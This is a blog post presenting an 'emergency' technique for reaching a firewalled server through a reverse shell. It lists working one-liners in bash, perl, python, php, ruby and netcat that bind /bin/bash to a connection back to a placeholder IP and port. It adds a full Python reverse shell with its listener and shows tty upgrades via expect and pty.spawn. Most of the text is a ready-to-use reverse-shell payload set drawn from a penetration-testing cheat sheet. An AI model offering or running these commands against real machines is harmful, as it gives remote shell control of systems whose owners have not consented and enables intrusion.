Emergency reverse shell technique

18 Jun 2015 08:44 | security

Don't you just hate it when an emergency happens with an important server and
access from your location is firewalled?  Luckily if there's someone else local
to the machine who can execute commands for you, getting onto it is fairly
trivial.

First make sure that the machine you're on can accept connections from the
internet on a TCP port (any).  Typically you'll need to map this through on
whatever firewall/router you've got on the local network.

Let's say your ip address is 127.127.127.127 (a placeholder throughout; use the
public address the remote machine can actually reach) and you've mapped tcp port
13131.  Simply listen on the port with netcat:

$ nc -l 13131

(the OpenBSD netcat and ncat take the port like that; traditional netcat wants
it after -p, i.e. nc -l -p 13131), then have someone on the remote machine run
any of these:

bash (the /dev/tcp path is a bash feature, so this won't work under sh/dash):

bash -i >& /dev/tcp/127.127.127.127/13131 0>&1

perl:

perl -e 'use Socket;$i="127.127.127.127";$p=13131;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.127.127.127",13131));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

php (this assumes the socket ends up on file descriptor 3, which it does when
it's the first descriptor the php process opens; if you get nothing back, try
4, 5, 6 in place of the 3s):

php -r '$sock=fsockopen("127.127.127.127",13131);exec("/bin/bash -i <&3 >&3 2>&3");'

ruby:

ruby -rsocket -e'f=TCPSocket.open("127.127.127.127",13131).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'

netcat (only builds that support -e, such as netcat-traditional and ncat; the
OpenBSD netcat that most Debian/Ubuntu systems ship doesn't have it):

nc -e /bin/bash 127.127.127.127 13131

and hey presto, your netcat listener is now connected to the shell. Of course
the connection isn't encrypted or authenticated (nothing checks who is on
either end of it), so you'll want to be careful what you type over it and
remove the port mapping once you're done, but for emergency use it's quite
handy. The advantage over the obvious choice for this (ssh) is that you don't
have to give the person who's at the server end any credentials to log into
your machine with in order to set up the connection.
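To see the mechanism end to end without a second machine, here is an added example (mine, not code from the original post or from pentestmonkey) that plays both roles on 127.0.0.1: reverse_shell() does what the python one-liner above does, and drive_reverse_shell() takes netcat's place as the listener, feeds the shell a few commands and collects what it writes back. The function names, the ephemeral port and the use of /bin/sh rather than bash -i (so the output is deterministic) are my choices.

```python
"""Added example: a TCP reverse shell and its listener, both on localhost."""
import socket
import subprocess
import threading


def reverse_shell(host, port, shell="/bin/sh"):
    """Connect back to host:port and run a shell whose stdin/stdout/stderr
    are the socket.  This is the page's python one-liner, except the fd is
    handed straight to Popen instead of dup2()'d over this process's own
    0/1/2, so the demo can keep its terminal.  Returns the shell's exit
    status."""
    sock = socket.create_connection((host, port))
    fd = sock.fileno()
    proc = subprocess.Popen([shell], stdin=fd, stdout=fd, stderr=fd)
    status = proc.wait()
    sock.close()          # our copy; the child had its own duplicates
    return status


def drive_reverse_shell(commands, shell="/bin/sh", timeout=10):
    """Listener side (the `nc -l` role): accept one callback, send `commands`
    to the shell and collect everything it writes.  Returns (output, exit
    status); the exit status is None if the shell never reported one."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))   # port 0: let the kernel pick a free one
    listener.listen(1)
    port = listener.getsockname()[1]

    # The "remote machine" runs the callback in a thread of this process.
    status = []
    worker = threading.Thread(
        target=lambda: status.append(reverse_shell("127.0.0.1", port, shell)))
    worker.start()

    conn, _ = listener.accept()
    conn.settimeout(timeout)
    script = "".join(cmd + "\n" for cmd in commands) + "exit\n"
    conn.sendall(script.encode())
    conn.shutdown(socket.SHUT_WR)   # EOF on the shell's stdin: it exits even without `exit`

    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:                # shell exited and its fds were closed
            break
        chunks.append(data)
    conn.close()
    listener.close()
    worker.join(timeout)
    output = b"".join(chunks).decode(errors="replace")
    return output, (status[0] if status else None)


if __name__ == "__main__":
    out, rc = drive_reverse_shell(["echo reverse-shell-ok", "id", "exit 7"])
    print(out)
    print("shell exit status:", rc)
```

Because stdout and stderr both point at the socket, the listener sees prompts, errors and command output interleaved, exactly as you would over netcat; that is also why the one-liners on the page redirect all three descriptors rather than just stdout.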

source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Update

One limitation of this is that you won't have a tty, which makes many things
impossible or difficult (anything that insists on a terminal, such as su and
sudo prompting for a password, ssh, screen and most editors).

However if expect is installed you can get one by dropping this into a file and
running it (chmod +x it, or run it as expect <file>):

#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.  The new shell will
# have a good enough TTY to run tools like ssh, su and login
spawn bash
interact

then you have a full tty and can run sudo, su, screen etc :)
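The following added example (mine, not the post's or expect's code) shows concretely what the update is talking about, using Python's standard pty module in place of expect: the same shell test, `[ -t 0 ]`, answers NOTTY when run behind a pipe, as it would behind the reverse shell's socket, and TTY when run under a pseudo-terminal. upgrade_to_tty() is the pty-module equivalent of the expect script's `spawn bash` / `interact`, for when python is on the box but expect isn't. The function names and the probe snippet are mine.

```python
"""Added example: why a reverse shell has no tty, and how a pseudo-terminal fixes it."""
import os
import pty
import subprocess

# Shell snippet that reports whether its stdin is a terminal (POSIX `[ -t 0 ]`).
PROBE = 'if [ -t 0 ]; then echo TTY; else echo NOTTY; fi'


def probe_without_pty():
    """Run the probe the way a reverse shell runs things: stdin is a pipe
    here and a socket in the real case; either way it is not a terminal."""
    result = subprocess.run(["/bin/sh", "-c", PROBE],
                            input="", capture_output=True, text=True)
    return result.stdout.strip()


def probe_with_pty():
    """Run the same probe under a pseudo-terminal, which is what expect's
    `spawn` does: the child gets the slave side of a pty as its controlling
    terminal, so `[ -t 0 ]` is true."""
    pid, master_fd = pty.fork()
    if pid == 0:
        os.execv("/bin/sh", ["/bin/sh", "-c", PROBE])   # child: never returns
        os._exit(127)
    chunks = []
    while True:
        try:
            data = os.read(master_fd, 1024)
        except OSError:   # Linux raises EIO on the master once the child closed the slave
            break
        if not data:
            break
        chunks.append(data)
    os.close(master_fd)
    os.waitpid(pid, 0)
    # the pty's output translation turns "\n" into "\r\n"; strip() removes it
    return b"".join(chunks).decode().strip()


def upgrade_to_tty(shell="/bin/bash"):
    """What you would run from inside the non-tty reverse shell instead of
    the expect script: pty.spawn runs the shell on a new pty and relays bytes
    between it and the current stdin/stdout (the socket) until the shell
    exits.  Returns the waitpid() status of the shell."""
    return pty.spawn([shell])


if __name__ == "__main__":
    print("behind a pipe:", probe_without_pty())
    print("under a pty:  ", probe_with_pty())
```

In practice the upgrade is the one-liner `python -c 'import pty; pty.spawn("/bin/bash")'` typed into the reverse shell; like the expect script it gives you a pty for su, sudo and screen, but not terminal size or signal handling from your side, since netcat is still relaying raw bytes.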